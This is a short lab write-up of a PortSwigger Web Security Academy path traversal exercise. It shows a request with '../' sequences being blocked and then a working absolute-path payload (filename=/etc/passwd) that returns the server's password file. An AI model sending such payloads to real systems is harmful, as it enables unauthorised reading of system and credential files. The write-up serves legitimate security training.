| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Path Traversal (Absolute Path Bypass) |
| Difficulty | Practitioner |
| Objective | Retrieve the contents of /etc/passwd |
File Path Traversal, Traversal Sequences Blocked with Absolute Path Bypass¶
A shopping app displaying item images loads something like:
<img src="/image?filename=28.jpg">
Intercepting the request on Burp:
GET /image?filename=28.jpg HTTP/2
Trying the same approach as the previous lab:
GET /image?filename=../../../../../etc/passwd HTTP/2
Comes back as "no such file" — ../ sequences are stripped or blocked here. The app blocks ../ but treats the supplied filename as relative to a default working directory. If it strips traversal sequences but doesn't enforce that the path stays relative, an absolute path might work directly without any traversal at all:
GET /image?filename=/etc/passwd HTTP/2
This returns /etc/passwd directly.
And lab solved